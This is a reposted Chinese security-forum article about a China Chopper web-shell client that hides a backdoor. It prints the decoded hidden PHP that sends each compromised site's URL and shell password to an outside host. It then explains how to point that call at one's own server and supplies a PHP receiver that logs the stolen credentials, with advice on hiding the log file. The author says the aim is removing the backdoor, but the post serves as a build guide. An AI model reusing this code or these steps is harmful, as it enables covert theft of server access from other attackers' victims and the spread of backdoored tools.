安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > 如何制作属于自己的菜刀后门[转]

如何制作属于自己的菜刀后门[转]

时间:2014-12-11来源:未知 作者:安云网点击:
逛论坛看到这个文章: http://sb.f4ck.org/thread-20098-1-1.html 里面有一个过狗菜刀。 我也到处找一个原版的过狗菜刀呢。作者提示有后门。 down下来抓包看了一下。 seay=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3Bz0=QGV2YWw

逛论坛看到这个文章:http://sb.f4ck.org/thread-20098-1-1.html
里面有一个过狗菜刀。 //copyright AnYun.ORG
我也到处找一个原版的过狗菜刀呢。作者提示有后门。
down下来抓包看了一下。

//本文来自安云网

  1. seay=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuIi8iLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=TzpcXHhhbXBwc1xcaHRkb2NzXFw%3D

    //ANYUN.ORG

复制代码 //安云网,anyun.org




第一次解码。

//本文来自安云网

  1. seay=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&[email protected](base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5nb29kZG9nLmluL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);[email protected]($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while([email protected]($F)){$P=$D."/".$N;[email protected]("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."

    //安云网,anyun.org

  2. ";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();=&z1=O:\\xampps\\htdocs\\7 //copyright AnYun.ORG

复制代码 //copyright AnYun.ORG




我们看到还有一个base64编码。这个编码里面就有后门。
第二次完整解码之后是。

//安云网,anyun.org

//ANYUN.ORG

  1. seay=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&[email protected](if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.gooddog.in/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}'));@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);[email protected]($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while([email protected]($F)){$P=$D."/".$N;[email protected]("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
    //安云网,anyun.org

  2. ";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();=&z1=O:\\xampps\\htdocs\\7

    //ANYUN.ORG

复制代码 //本文来自安云网



后门地址出来了。
http://www.gooddog.in/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST

//安云网,anyun.org




修改很简单的。
//安云网,anyun.org
用c32A查找。第一次解码的时候得出来的base64编码
//内容来自AnYun.ORG

  1. aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5nb29kZG9nLmluL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9 //内容来自AnYun.ORG

复制代码 //内容来自AnYun.ORG



找到之后。我们解码得到:

//copyright AnYun.ORG

  1. if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.gooddog.in/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}

    //内容来自AnYun.ORG

复制代码

//安云网,anyun.org


我们修改地址http://www.gooddog.in/ 修改为 http://127.0.0.1//////再次编码。  这样就好了。
我讲解一下为什么我要在后面加呐么多的杠杠杠杠。 因为要符合原来的编码长度。 原来的编码加密后是 100位。你修改的也要100位。不然会出错。

//安云网咨询系统



本次想说的是修改为自己的后门菜刀。
那好。把接收端放出来。 //ANYUN.ORG
//copyright AnYun.ORG

  1. <?php

    //ANYUN.ORG

  2. $filename = 'shell.txt';
    //本文来自安云网

  3. $word = "URL:".$_GET['Url']."---Pass:".$_GET['Pass']." \r\n";

    //本文来自安云网

  4. $fh = fopen($filename, "a");

    //安云网咨询系统

  5. echo fwrite($fh, $word);
    //内容来自AnYun.ORG

  6. fclose($fh);
    //安云网咨询系统

  7. ?>

    //内容来自AnYun.ORG

复制代码

//ANYUN.ORG



保存为API.php即可。每次被请求。都会把shell生成在 shell.txt这个文件里面。这个名字自己修改。避免被挖掘。

//ANYUN.ORG



亲测成功。不用感谢。我是小雅。   我的意思不是让你们做自己的后门菜刀。我只是想说怎么去掉这个菜刀的后门而已。。。
但是感觉标题如果是 去菜刀后门,太没有人气了。。呐就想着来个混金币的标题,呐就是制作一枚自己的后门菜刀。 //内容来自安云网
为了混搭标题。所以就把接收端也丢出来了。虽然很次很渣渣。但为了这个接收端,我还用果照和某大牛交换的。。。 //copyright AnYun.ORG


//安云网咨询系统

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容